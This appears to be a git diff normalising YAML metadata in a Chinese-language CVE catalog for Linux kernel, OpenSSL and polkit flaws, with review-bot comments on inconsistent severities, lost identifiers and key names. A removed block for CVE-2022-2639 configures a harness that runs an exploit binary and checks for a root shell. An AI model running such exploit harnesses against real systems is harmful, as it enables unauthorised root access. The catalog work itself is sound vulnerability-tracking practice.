CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-0492 cwe-id: CWE-287 - tags: 权限提升,容器逃逸,cve2022 \ No newline at end of file + cnvd-id: None + kve-id: None + tags: 权限提升, 容器逃逸, cve2022 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-0847.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-0847.yaml index b5a28492..04f3fdc4 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-0847.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-0847.yaml @@ -12,7 +12,7 @@ info: - https://bugzilla.redhat.com/show_bug.cgi?id=2060795 - https://security.netapp.com/advisory/ntap-20220325-0005/ classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-0847 cwe-id: CWE-665, CWE-281 diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-0995.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-0995.yaml index 6cbe8968..14847983 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-0995.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-0995.yaml 
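Review bot: The severity value is normalized inconsistently for a commit titled as a format update: this hunk writes `severity: High`, CVE-2022-1015 below writes `severity: Medium`, CVE-2022-25258, CVE-2022-0778 and CVE-2023-22809 keep `high`/`medium`, and vim CVE-2021-3778 keeps `HIGH`. The `cnvd-id: None` / `kve-id: None` fields were normalized to one spelling across every file here, so severity should get the same treatment, e.g. one fixed set such as `critical`/`high`/`medium`/`low` that matches the majority of untouched files. Otherwise any consumer that filters on severity has to case-fold, and `超危` → `High` in CVE-2023-0045 further down silently changes the rating rather than just its spelling.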
@@ -15,6 +15,6 @@ info: cvss-score: 7.8 cve-id: CVE-2022-0995 cwe-id: CWE-787 - cnvd-id: - kve-id: - tags: 内核越界,权限提升,cve2022 \ No newline at end of file + cnvd-id: None + kve-id: None + tags: 内核越界, 权限提升, cve2022 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-1015.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-1015.yaml index d4339dfc..0fa3364c 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-1015.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-1015.yaml @@ -2,17 +2,19 @@ id: CVE-2022-1015 source: https://github.com/pqlx/CVE-2022-1015 info: name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: high + severity: Medium description: | 在netfilter子系统的linux/net/netfilter/nf_tables_api.c中发现了Linux内核的一个缺陷。此漏洞允许本地用户导致越界写入问题。 scope-of-influence: - 5.12 ≤ kernel < 5.17 + 5.12 ≤ Linux-Kernel < 5.17 reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-1015 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=6e1acfa387b9ff82cfc7db8cc3b6959221a95851 classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H cvss-score: 6.6 cve-id: CVE-2022-1015 cwe-id: CWE-787 - tags: cve2022,权限提升 \ No newline at end of file + cnvd-id: None + kve-id: None + tags: cve2022, 权限提升 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-1679.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-1679.yaml index d07729f3..7c50227b 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-1679.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-1679.yaml @@ -16,4 +16,5 @@ info: cve-id: CVE-2022-1679 cwe-id: CWE-416 cnvd-id: None + kve-id: None tags: 权限提升, cve2022 diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-23222.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-23222.yaml index dec1b6bf..461d2912 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-23222.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-23222.yaml 
@@ -6,7 +6,7 @@ info: description: | 由于 Linux 内核的 BPF 验证器存在一个空指针漏洞,没有对 *_OR_NULL 指针类型进行限制,允许这些类型进行指针运算。攻击者可利用该漏洞在获得低权限的情况下,构造恶意数据执行空指针引用攻击,最终获取服务器 root 权限 scope-of-influence: - Linux kernel(>=5.8 && <=5.16) + 5.8 ≤ Linux kernel ≤ 5.16 reference: - https://www.openwall.com/lists/oss-security/2022/06/04/3 - https://security.netapp.com/advisory/ntap-20220217-0002/ @@ -17,4 +17,4 @@ info: cwe-id: CWE-476 cnvd-id: None kve-id: None - tags: cve2022,权限提升 \ No newline at end of file + tags: cve2022, 权限提升 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-24122.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-24122.yaml index de53968b..7ac52ce3 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-24122.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-24122.yaml @@ -6,7 +6,7 @@ info: description: | 由于Linux kernel中存在资源管理错误漏洞,当kernel/ucount.c(非特权时)启用非特权用户命名空间时,允许释放后继续使用和特权升级,因为ucounts对象的寿命可以比其命名空间长。 scope-of-influence: - Linux kernel(>=5.14 && <=5.16.4) + 5.14 ≤ Linux kernel ≤ 5.16.4 reference: - https://ubuntu.com/security/CVE-2022-24122 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24122 diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-25258.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-25258.yaml index 75f50892..6fc8ac15 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-25258.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-25258.yaml @@ -1,6 +1,5 @@ id: CVE-2022-25258 -source: - https://github.com/szymonh/d-os-descriptor +source: https://github.com/szymonh/d-os-descriptor info: name: Linux kernel是Linux操作系统的主要组件,也是计算机硬件与其进程之间的核心接口。它负责两者之间的通信,还要尽可能高效地管理资源。Linux kernel主要负责内存管理、进程管理、设备驱动程序、系统调用和安全防护四项作用。 severity: medium diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-25265.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-25265.yaml index d64f2726..5c7a3abc 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-25265.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-25265.yaml 
@@ -10,10 +10,10 @@ info: reference: - https://nvd.nist.gov/vuln/detail/cve-2022-25265 classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-25265 cwe-id: CWE-913 - cnvd-id: none - kve-id: none + cnvd-id: None + kve-id: None tags: Linux kernel, 内存损坏 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-25636.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-25636.yaml index 2c62a5ce..4018b6f4 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-25636.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-25636.yaml @@ -14,5 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-25636 - cnvd-id: CNNVD-202202-1743 - tags: 堆越界,权限提升,cve2022 + cwe-id: CWE-269 + cnvd-id: None + kve-id: None + tags: 堆越界, 权限提升, cve2022 diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-2586.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-2586.yaml index d8579295..271dcfba 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-2586.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-2586.yaml @@ -25,5 +25,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 6.7 cve-id: CVE-2022-2586 - cnvd-id: NONE + cwe-id: None + cnvd-id: None + kve-id: None tags: netfilter, cve2022 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-2588.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-2588.yaml index d5584e0f..6286b953 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-2588.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-2588.yaml @@ -15,6 +15,6 @@ info: cvss-score: 7.8 cve-id: CVE-2022-2588 cwe-id: CWE-416 - cnvd-id: - kve-id: - tags: UAF,拒绝服务,权限提升,cve2022 \ No newline at end of file + cnvd-id: None + kve-id: None + tags: UAF, 拒绝服务, 权限提升, cve2022 \ No newline at end of file 
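Review bot: The CVE-2022-25636 hunk replaces `cnvd-id: CNNVD-202202-1743` with `cnvd-id: None`, which discards a real cross-reference rather than correcting where it lives; CVE-2022-32250 below does the same with `CNNVD-202206-407`. These were CNNVD identifiers stored under the wrong key, so the format fix should move them, for example into a separate key such as `cnnvd-id:` (new field name, to be agreed with the schema) or into `reference:`, instead of dropping them. As written the patch loses data that a reader cannot recover from the rest of the file.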
diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-2602.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-2602.yaml deleted file mode 100644 index 1f1fc84d..00000000 --- a/cve/linux-kernel/2022/yaml/CVE-2022-2602.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: CVE-2022-2602 -source: https://seclists.org/oss-sec/2022/q4/57 -info: - name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: high - description: | - io_uring UAF, Unix SCM garbage collection - scope-of-influence: - Linux kernel < 5.10.149-1 - reference: - - https://ubuntu.com/security/CVE-2022-2602 - classification: - cvss-metrics: CVSS:3.1 - cvss-score: 漏洞评分 - cve-id: CVE-2022-2602 - cwe-id: None - cnvd-id: None - kve-id: None - tags: cve2022,UAF \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-2639.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-2639.yaml index 01b0e4d7..74482ef6 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-2639.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-2639.yaml 
@@ -1,48 +1,20 @@ -FormatVer: 20220411 -Id: CVE-2022-2639 -Belong: kernel -PocHazardLevel: low -Source: https://github.com/avboy1337/CVE-2022-2639-PipeVersion -SiteInfo: - Name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核 - Severity: high - Description: +id: CVE-2022-2639 +source: https://github.com/avboy1337/CVE-2022-2639-PipeVersion +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核 + severity: high + description: 由于 openvswitch模块中reserve_sfa_size()函数在使用过程中存在缺陷,导致本地经过身份认证的攻击者可以利用漏洞提升至root权限 - ScopeOfInfluence: - kernel(>=3.13 && <5.18) - References: + scopeOfInfluence: + 3.13 ≤ Linux-Kernel < 5.18 + references: - https://nvd.nist.gov/vuln/detail/CVE-2022-2639 - https://github.com/torvalds/linux/commit/cefa91b2332d7009bc0be5d951d6cbbf349f90f8 - SiteClassification: - CvssMetrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - CvssScore: 7.8 - CveId: CVE-2022-2639 - CweId: None - CnvdId: None - KveId: None - Tags: - - ve2022 - - 权限提升 -SiteRequests: - Implement: - ImArray: - - Exec : "CVE-2022-2639_x86_64" - Args : - ExpireTime: 30 #second - - # < input - # > output - # . wait - # ? condition - # : content - # - #组合起来 - # >. 等待直到输出 - # << 输入字符 - # >?判断条件 - Inter: - - ">.:infinitely ..." #等待输出'infinitely ...' - - "<<:id\n" #输入'id\n' - - ">.:\n" #等待输出'\n' - - ">?:uid=0(root)" #判断输出为'uid=0(root)'为成功 - Condition: None + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2022-2639 + cwe-id: CWE-171, CWE-787, CWE-192 + cnvd-id: None + kve-id: None + tags: cve2022, 权限提升 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-27666.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-27666.yaml index e9c89f4b..cc94bd93 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-27666.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-27666.yaml 
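Review bot: The rewritten CVE-2022-2639 file uses the keys `scopeOfInfluence:` and `references:`, while every other file in this patch uses `scope-of-influence:` and `reference:` (see the CVE-2022-0185, CVE-2022-0492 and CVE-2022-1015 hunks); a consumer keyed on the common schema will not see this file's affected-version range or its links. The two lines should be `scope-of-influence:` and `reference:`. CVE-2023-22809 further down keeps `references:` on its new side and has the same problem.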
@@ -6,7 +6,7 @@ info: description: | Linux kernel 5.16.15之前版本存在安全漏洞,该漏洞源于net/ipv4/esp4.c 和 net/ipv6/esp6.c 中IPsec ESP 代码存在缓冲区溢出。本地攻击者可利用该漏洞通过覆盖内核堆对象获得特权。 scope-of-influence: - ~ linux kernel 5.17-rc5 + linux kernel < 5.17-rc5 reference: - https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.16.15 - https://www.debian.org/security/2022/dsa-5173 @@ -15,4 +15,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-27666 - tags: 缓冲区溢出,权限提升,cve2022 + cwe-id: CWE-787 + cnvd-id: None + kve-id: None + tags: 缓冲区溢出, 权限提升, cve2022 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-32250.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-32250.yaml index 611fb2f1..1f8c0acb 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-32250.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-32250.yaml @@ -14,5 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-32250 - cnvd-id: CNNVD-202206-407 - tags: CVSS严重性评级,修复信息,易受攻击的软件版本,SCAP映射,CPE信息,cve2022 + cwe-id: CWE-416 + cnvd-id: None + kve-id: None + tags: Linux Kernel, cve2022 diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-34918.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-34918.yaml index 17920579..e38f5778 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-34918.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-34918.yaml @@ -6,7 +6,7 @@ info: description: | Linux kernel 5.18.9版本及之前版本存在安全漏洞,该漏洞源于。本地攻击者利用该漏洞使用 nft_set_elem_init 中的类型混淆错误(导致缓冲区溢出)来提升权限。 scope-of-influence: - Linux kernel(>=5.8.0 && <=5.18.9) + 5.8.0 ≤ Linux kernel ≤ 5.18.9 reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34918 - https://nvd.nist.gov/vuln/detail/CVE-2022-34918 
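Review bot: The CVE-2022-27666 scope line now says `linux kernel < 5.17-rc5`, but the description directly above it says the flaw exists in versions before 5.16.15 and the file's first reference is `ChangeLog-5.16.15`; the file disagrees with itself about where the fix landed, and the `~` → `<` edit only changed the operator. The three should be reconciled against the linked changelog, and the product name should follow the `Linux-Kernel` spelling the other rewritten scope lines in this patch use, e.g. `Linux-Kernel < 5.16.15` if the changelog is the authority. CVE-2022-34918 and CVE-2022-24122 in this same patch use yet another form, `Linux kernel`, so the product token is inconsistent three ways.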
diff --git a/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-36946.yaml similarity index 86% rename from cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml rename to cve/linux-kernel/2022/yaml/CVE-2022-36946.yaml index eb773fd6..f915cfe6 100644 --- a/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-36946.yaml 
@@ -1,18 +1,21 @@ -id: CVE-2022-36946 -source: https://github.com/Pwnzer0tt1/CVE-2022-36946 -info: - name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: 高危 - description: | - Linux5.18.14 内核中 net/netfilter/nfnetlink_queue.c 的nfqnl_mangle允许远程攻击者造成拒绝服务 (panic),因为在具有单字节nfta_payload属性的nf_queue判定的情况下,skb_pull可能会遇到负的 skb->len。 - scope-of-influence: - 5.18.14 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-36946 - - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=722d94847de29310e8aa03fcbdb41fc92c521756 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36946 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H - cvss-score: 7.5 - cve-id: CVE-2022-36946 - tags: 拒绝服务,cve2022 \ No newline at end of file +id: CVE-2022-36946 +source: https://github.com/Pwnzer0tt1/CVE-2022-36946 +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: High + description: | + Linux5.18.14 内核中 net/netfilter/nfnetlink_queue.c 的nfqnl_mangle允许远程攻击者造成拒绝服务 (panic),因为在具有单字节nfta_payload属性的nf_queue判定的情况下,skb_pull可能会遇到负的 skb->len。 + scope-of-influence: + Linux-Kernel = 5.18.14 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-36946 + - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=722d94847de29310e8aa03fcbdb41fc92c521756 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36946 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.5 + cve-id: CVE-2022-36946 + cwe-id: None + cnvd-id: None + kve-id: None + tags: 拒绝服务, cve2022 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-41218.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-41218.yaml index e5594093..a7ecbb14 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-41218.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-41218.yaml 
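Review bot: The kernel commit link kept on the new side of CVE-2022-36946, `commit?id=722d94847de29310e8aa03fcbdb41fc92c521756`, is the same commit id that CVE-2022-0185.yaml in this patch cites as the legacy_parse_param fix; one commit cannot be the fix for both an fs_context bug and the nfnetlink_queue nfqnl_mangle bug, so this reference looks copy-pasted and should be replaced with the commit NVD lists for CVE-2022-36946 or removed. Separately, `Linux-Kernel = 5.18.14` pins a single version, whereas the MITRE wording for this CVE is "through 5.18.14" and the description itself is a translation of that phrasing, so `Linux-Kernel ≤ 5.18.14` is more likely what was meant. Since the file is rewritten in full here, this was the right moment to fix both.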
@@ -6,11 +6,11 @@ info: description: | 在5.19.10之前的Linux内核中的drivers/media/dvb-core/dmxdev.c中,存在由refcount竞争导致的释放后使用,影响dvb_demux_open和dvb_dmxdev_release。 scope-of-influence: - Linux内核5.19.10之前的所有版本 + Linux-Kernel < 5.19.10 reference: - https://nvd.nist.gov/vuln/detail/cve-2022-41218 classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H cvss-score: 5.5 cve-id: CVE-2022-41218 cwe-id: CWE-416 diff --git a/cve/linux-kernel/2023/yaml/CVE-2023-0045.yaml b/cve/linux-kernel/2023/yaml/CVE-2023-0045.yaml index 0779d866..b4a6237a 100644 --- a/cve/linux-kernel/2023/yaml/CVE-2023-0045.yaml +++ b/cve/linux-kernel/2023/yaml/CVE-2023-0045.yaml @@ -2,17 +2,18 @@ id: CVE-2023-0045 source: https://github.com/es0j/CVE-2023-0045 info: name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: 超危 + severity: High description: Linux kernel存在安全漏洞,该漏洞源于绕过Spectre-BTI用户空间缓解措施。基于linux操作系统的Intel、AMD和 Arm 等现代处理器,被发现存在一个漏洞,攻击者可以绕过现有硬件防护缓解措施,实施Spectre BTI推测执行攻击,从而访问内存数据,可能引起信息泄漏。用于推测控制的prctl系统调用的当前实现未能保护用户免受在缓解之前执行的攻击者的攻击。seccomp缓解在此场景中也失败了。 scope-of-influence: - 5.5~5.15 + 5.5 ≤ Linux-Kernel ≤ 5.15 reference: - - https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2023-0179 - - https://docs.kernel.org/userspace-api/spec_ctrl.html - - https://elixir.bootlin.com/linux/v5.15.56/source/arch/x86/kernel/cpu/bugs.c#L1467 + - https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2023-0045 + - https://nvd.nist.gov/vuln/detail/CVE-2023-0045 classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cve-id: CVE-2023-0045 - cwe-id: - tags: 推测攻击,信息泄露,cve2023 \ No newline at end of file + cwe-id: CWE-610 + cnvd-id: None + kve-id: None + tags: 推测攻击, 信息泄露, cve2023 \ No newline at end of file 
diff --git a/cve/linux-kernel/2023/yaml/CVE-2023-0179.yaml b/cve/linux-kernel/2023/yaml/CVE-2023-0179.yaml index 74ca113b..33387ea2 100644 --- a/cve/linux-kernel/2023/yaml/CVE-2023-0179.yaml +++ b/cve/linux-kernel/2023/yaml/CVE-2023-0179.yaml @@ -19,5 +19,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2023-0179 - cnvd-id: NONE - tags: 缓冲区溢出,cve2023 \ No newline at end of file + cwe-id: CWE-190 + cnvd-id: None + kve-id: None + tags: 缓冲区溢出, cve2023 \ No newline at end of file diff --git a/cve/openssl/2016/yaml/CVE-2016-2107.yaml b/cve/openssl/2016/yaml/CVE-2016-2107.yaml index 0d605e24..b231edef 100644 --- a/cve/openssl/2016/yaml/CVE-2016-2107.yaml +++ b/cve/openssl/2016/yaml/CVE-2016-2107.yaml @@ -1,6 +1,5 @@ id: CVE-2016-2107 -source: - https://github.com/FiloSottile/CVE-2016-2107 +source: https://github.com/FiloSottile/CVE-2016-2107 info: name: OpenSSL是Openssl团队的一个开源的能够实现安全套接层(SSLv2/v3)和安全传输层(TLSv1)协议的通用加密库。该产品支持多种加密算法,包括对称密码、哈希算法、安全散列算法等。 severity: medium diff --git a/cve/openssl/2021/yaml/CVE-2021-3449.yaml b/cve/openssl/2021/yaml/CVE-2021-3449.yaml index 5e064af3..cd047c80 100644 --- a/cve/openssl/2021/yaml/CVE-2021-3449.yaml +++ b/cve/openssl/2021/yaml/CVE-2021-3449.yaml @@ -1,6 +1,5 @@ id: CVE-2021-3449 -source: - https://github.com/terorie/cve-2021-3449 +source: https://github.com/terorie/cve-2021-3449 info: name: OpenSSL是Openssl团队的一个开源的能够实现安全套接层(SSLv2/v3)和安全传输层(TLSv1)协议的通用加密库。该产品支持多种加密算法,包括对称密码、哈希算法、安全散列算法等。 severity: medium diff --git a/cve/openssl/2022/yaml/CVE-2022-0778.yaml b/cve/openssl/2022/yaml/CVE-2022-0778.yaml index b571f37c..9f209b49 100644 --- a/cve/openssl/2022/yaml/CVE-2022-0778.yaml +++ b/cve/openssl/2022/yaml/CVE-2022-0778.yaml 
@@ -4,11 +4,12 @@ info: name: OpenSSL是Openssl团队的一个开源的能够实现安全套接层(SSLv2/v3)和安全传输层(TLSv1)协议的通用加密库。该产品支持多种加密算法,包括对称密码、哈希算法、安全散列算法等。 severity: High description: 漏洞出自BN_mod_sqrt()接口函数,它用于计算模平方根,且期望参数p应该是个质数,但是函数内并没有进行检查,这导致内部可能出现无限循环。 - scope-of-influence: Openssl 1.0.2, 1.1.1 和 3.0 版本 + scope-of-influence: + Openssl 1.0.2, 1.1.1 和 3.0 版本 reference: - https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cve-id: CVE-2022-0778 cwe-id: CWE-835 diff --git a/cve/openssl/2022/yaml/CVE-2022-2274.yaml b/cve/openssl/2022/yaml/CVE-2022-2274.yaml index 5e366ebe..973b492c 100644 --- a/cve/openssl/2022/yaml/CVE-2022-2274.yaml +++ b/cve/openssl/2022/yaml/CVE-2022-2274.yaml @@ -19,4 +19,4 @@ info: cwe-id: CWE-787 cnvd-id: None kve-id: None - tags: 拒绝服务,DoS,cve2022,RCE,远程代码执行 \ No newline at end of file + tags: 拒绝服务, DoS, cve2022, RCE, 远程代码执行 \ No newline at end of file diff --git a/cve/openssl/2022/yaml/CVE-2022-3602.yaml b/cve/openssl/2022/yaml/CVE-2022-3602.yaml index 90d08aba..73bcf175 100644 --- a/cve/openssl/2022/yaml/CVE-2022-3602.yaml +++ b/cve/openssl/2022/yaml/CVE-2022-3602.yaml @@ -24,4 +24,4 @@ info: cwe-id: CWE-120 cnvd-id: None kve-id: None - tags: 缓存溢出,BOF,拒绝服务,DoS,cve2022,RCE,远程代码执行 \ No newline at end of file + tags: 缓存溢出, BOF, 拒绝服务, DoS, cve2022, RCE, 远程代码执行 \ No newline at end of file diff --git a/cve/openssl/2023/yaml/CVE-2023-25136.yaml b/cve/openssl/2023/yaml/CVE-2023-25136.yaml index 6879369c..ef5b2337 100644 --- a/cve/openssl/2023/yaml/CVE-2023-25136.yaml +++ b/cve/openssl/2023/yaml/CVE-2023-25136.yaml @@ -18,4 +18,4 @@ info: cwe-id: CWE-415 cnvd-id: None kve-id: None - tags: 拒绝服务,DoS \ No newline at end of file + tags: 拒绝服务, DoS \ No newline at end of file diff --git a/cve/polkit/2021/yaml/CVE-2021-3560.yaml b/cve/polkit/2021/yaml/CVE-2021-3560.yaml index d378eb64..e0ad57ec 100644 
--- a/cve/polkit/2021/yaml/CVE-2021-3560.yaml +++ b/cve/polkit/2021/yaml/CVE-2021-3560.yaml @@ -6,7 +6,7 @@ info: description: | 发现polkit可能被欺骗,绕过D-Bus请求的凭据检查,将请求者的权限提升到root用户。 scope-of-influence: - 0.105 ≥ policykit ≥ 0.113 + 0.105 ≤ policykit ≤ 0.113 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-3560 - https://ubuntu.com/security/CVE-2021-3560 @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2021-3560 - cwe-id: CWE-754,CWE-863 + cwe-id: CWE-754, CWE-863 cnvd-id: None kve-id: None - tags: cve2021,权限提升 \ No newline at end of file + tags: cve2021, 权限提升 \ No newline at end of file diff --git a/cve/polkit/2021/yaml/CVE-2021-4034.yaml b/cve/polkit/2021/yaml/CVE-2021-4034.yaml index 9322d045..9cbe6b9a 100644 --- a/cve/polkit/2021/yaml/CVE-2021-4034.yaml +++ b/cve/polkit/2021/yaml/CVE-2021-4034.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2021-4034 - cwe-id: CWE-787,CWE-125 + cwe-id: CWE-787, CWE-125 cnvd-id: None kve-id: None - tags: cve2021,权限提升 \ No newline at end of file + tags: cve2021, 权限提升 \ No newline at end of file diff --git a/cve/python/2022/yaml/CVE-2022-30286.yaml b/cve/python/2022/yaml/CVE-2022-30286.yaml index 613b5007..c76e9e07 100644 --- a/cve/python/2022/yaml/CVE-2022-30286.yaml +++ b/cve/python/2022/yaml/CVE-2022-30286.yaml @@ -20,5 +20,4 @@ info: cwe-id: None cnvd-id: None kve-id: None - tags: - - Source Codes Read \ No newline at end of file + tags: Source Codes Read \ No newline at end of file diff --git a/cve/python/2022/yaml/CVE-2022-35411.yaml b/cve/python/2022/yaml/CVE-2022-35411.yaml index 3e14c184..3ac53181 100644 --- a/cve/python/2022/yaml/CVE-2022-35411.yaml +++ b/cve/python/2022/yaml/CVE-2022-35411.yaml @@ -18,5 +18,4 @@ info: cwe-id: None cnvd-id: None kve-id: None - tags: - - 远程代码执行 + tags: 远程代码执行 
